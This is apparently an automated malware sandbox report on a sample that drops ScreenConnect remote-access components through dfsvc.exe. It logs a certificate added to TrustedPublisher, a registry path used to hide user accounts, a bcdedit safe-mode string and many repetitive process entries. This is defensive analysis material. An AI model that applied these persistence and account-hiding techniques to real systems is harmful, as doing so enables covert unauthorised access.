                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.Core.dll.1.drStatic PE information: 0xA383EAF1 [Wed Dec 6 12:32:49 2056 UTC]
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00761000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeStatic PE information: real checksum: 0x14df5 should be: 0x175cb
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761BC0 push ecx; ret 0_2_00761BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF93699D2A5 pushad ; iretd 1_2_00007FF93699D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AB845E push eax; ret 1_2_00007FF936AB846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AB842E pushad ; ret 1_2_00007FF936AB845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF936AB7D00 push eax; retf 1_2_00007FF936AB7D1D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AC8071 pushad ; retf 4_2_00007FF936AC809D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AB30B2 pushad ; iretd 4_2_00007FF936AB30B3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AB2E40 pushad ; ret 4_2_00007FF936AB2E73
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AC845E push eax; ret 4_2_00007FF936AC846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936AC8430 pushad ; ret 4_2_00007FF936AC845D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936D9E725 pushad ; iretd 4_2_00007FF936D9E7B9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936D97C5E push eax; retf 4_2_00007FF936D97C6D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeCode function: 4_2_00007FF936D97C2E pushad ; retf 4_2_00007FF936D97C5D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.exeJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Contains functionality to hide user accounts
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1496697785.0000000000D20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.000000000288E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.exe, 00000005.00000002.1445573934.0000000005112000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 00000005.00000002.1444630870.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
